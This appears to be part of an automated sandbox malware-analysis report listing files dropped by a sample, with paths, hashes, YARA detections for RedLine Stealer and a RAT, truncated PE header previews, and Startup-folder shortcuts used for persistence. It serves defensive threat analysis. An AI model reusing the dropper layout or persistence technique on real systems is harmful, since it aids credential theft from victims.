SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u2xs.2\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Reputation:	unknown
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Local\Temp\u2xs.2\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u2xs.2\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Reputation:	unknown
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u2xs.3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\i1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Local\Temp\wygmbcpqogng

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9725007009807523
Encrypted:	false
SSDEEP:	48:8pdaTm54twHridAKZdA19ehwiZUklqehJy+3:8e/WCy
MD5:	43C19720F9393971DDAEA6A98E92836B
SHA1:	AC7D5BEA1A3223A956E81444FF95C09197F8E1F7
SHA-256:	AD0B72D467ACCED3B5CA73A90D1CF5DFEA0A0E9023171363132016D011067129
SHA-512:	4CD84D3F587774975436A8D8E6B1E2697E81322CD91BAC1254D5900E686214BAB65263A30ADDB31FF439992FAC82FE7C6E7EFB3B9DF60DA1712C5C82FC6FB123
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....8/.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Xny....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xny....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xny....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xny..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xpy...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........W.u......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9894115116487505
Encrypted:	false
SSDEEP:	48:8bdaTm54twHridAKZdA1weh/iZUkAQkqehyy+2:8Q/09Qjy
MD5:	99A58D00DDDE00F9E95660D6731A5135
SHA1:	86A02F2A237CC86740EFFAA6A546AC4D10F2602B
SHA-256:	1802C925742458697080CDC759B2DAC35C3DA9E871498B76FE16F43B236D3888
SHA-512:	5E770D937F4633ECBB0A4C64E9E19DB70C716A5278D1EF03F428077660C0A05104CEDF15CA7BDEC996C63E86B424FC5937ACB381514BC505D58DEC7AA7B54312
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Xny....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xny....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xny....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xny..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xpy...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........W.u......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0014538773558375
Encrypted:	false
SSDEEP:	48:8x3daTm54sHridAKZdA14tseh7sFiZUkmgqeh7sky+BX:8xU/ynmy
MD5:	26A01932D2537D9FA16B8A54DE5C7666
SHA1:	F6DD184F4DF113821BC291309C4A03053AC7A351
SHA-256:	1983E1B7EE6028D014D7B4922AD0B51978A382CEC8F53126DCDE22065A8E9F80
SHA-512:	B58BB90670E08563199FB7CC750121D1A10B8B63968DE0588D33BB4E6DAD68E7246C51E6EB67B9AAD72F05544185E03A5CCC63F6CF990F40FDB68500206B834E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Xny....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xny....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xny....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xny..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........W.u......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9835279299740027
Encrypted:	false
SSDEEP:	48:8EdaTm54twHridAKZdA1vehDiZUkwqeh+y+R:8V/f8y
MD5:	452EA1C16F5665FBED950FB66A0AE0D2
SHA1:	DC81E018FC32A02A5797E01CE03C55799316787B
SHA-256:	6F24CB0C22599467F454FB8A0AC7E56FD7816BEB28A2503759B4A7817FF7380B
SHA-512:	123A05C20850D59C24B4306731CC6F80627AD7FC66393A4F8F8A0A7CC96C9CCBD824656962E2091C4D417FFCBFCFE3082F3EE1A7996949D5EBA6FB8E77D67DB1
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....a.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Xny....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xny....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xny....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xny..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xpy...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........W.u......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9782403593772093
Encrypted:	false
SSDEEP:	48:89daTm54twHridAKZdA1hehBiZUk1W1qeh4y+C:8q/f9Yy
MD5:	05F6109391A86BC7D27DF28C98B34E85
SHA1:	A50DFB29B07C00ED276E5245DCB253D23BEB6F77
SHA-256:	F08B15F72D0D8E87E5B5CEDD5526AC21EBE1CA877321FA442B715ACFF3C55973
SHA-512:	50B4B1485EA5D1E090DC31A66D4ACAAE46D22A23A4507C5BF783737D75EAAD54B1BE2A5372F06BF87CFAB7E64FED15BE8BE7C43907A2C07E6669FA134290D49B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Xny....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xny....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xny....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xny..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xpy...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........W.u......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.98659414850115
Encrypted:	false
SSDEEP:	48:87daTm54twHridAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8w/XT/TbxWOvTbmy7T
MD5:	EF21F52BDB07D2AE20DE4E0081267887
SHA1:	B5B102E28E03589972F3C6ACE52253EC00DD8958
SHA-256:	5DFF0365F9EC7AB91F5CAF7EDAAA1B57BDA58719CA2412D18CDDEAF2E9DB8549
SHA-512:	54AB7412185A917E07B01EA5FA71992B7C35B907CE927908DB05478EE404F5F799FCB9C690FA3CEE9860F7679FFD1880D284EDA8E16B895D7D1FDB4C5026DDBF
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....[......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Xny....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xny....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xny....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xny..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xpy...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........W.u......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITA80.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	4.989651873610461
Encrypted:	false
SSDEEP:	12:85JowAv14fN88CylsapSRaLgKEw/OraARjA2tnA0awuLw0rWr34t2YZ/elFlSJm1:85fmCfe855SRAgKZOraeA+n2Qzqygm
MD5:	7243F8B7F3E6528B32DECA95AFFD2399
SHA1:	5494C3E9626CDF650027BF4CE1D6D71D5260B4CB
SHA-256:	93067C4943F6D95D1D947DE5E6B212F1C633A693B1568B2DDC6A0346EE2162F2
SHA-512:	C6D189EA12EB1B295916015D8E37C74F3619C1F1439D60909CF28F06A2A46E50B1BEFA987627BE264ADD1AA580C372057F98A801F9897210FF0A246844977EBD
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....Z.!....L......Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&...... M.....j......j.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XYy....B.....................Bdg.A.p.p.D.a.t.a...B.P.1......XWy..Local.<......DWSl.XYy....V.........................L.o.c.a.l.....N.1......Xqy..Temp..:......DWSl.Xqy....\.....................K.-.T.e.m.p.....T.1......Xiy..u2xs.2..>......Xhy.Xiy............................K.u.2.x.s...2.....V.2.0.%..X./ .run.exe.@......X./.Xky..............................r.u.n...e.x.e.......`...............-......._...........W.u......C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe......\.u.2.x.s...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......899552...........hT..CrF.f4... .^3.@.....,...W..hT..CrF.f4... .^3.@.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	4.989651873610461
Encrypted:	false
SSDEEP:	12:85JowAv14fN88CylsapSRaLgKEw/OraARjA2tnA0awuLw0rWr34t2YZ/elFlSJm1:85fmCfe855SRAgKZOraeA+n2Qzqygm
MD5:	7243F8B7F3E6528B32DECA95AFFD2399
SHA1:	5494C3E9626CDF650027BF4CE1D6D71D5260B4CB
SHA-256:	93067C4943F6D95D1D947DE5E6B212F1C633A693B1568B2DDC6A0346EE2162F2
SHA-512:	C6D189EA12EB1B295916015D8E37C74F3619C1F1439D60909CF28F06A2A46E50B1BEFA987627BE264ADD1AA580C372057F98A801F9897210FF0A246844977EBD
Malicious:	false
Reputation:	unknown
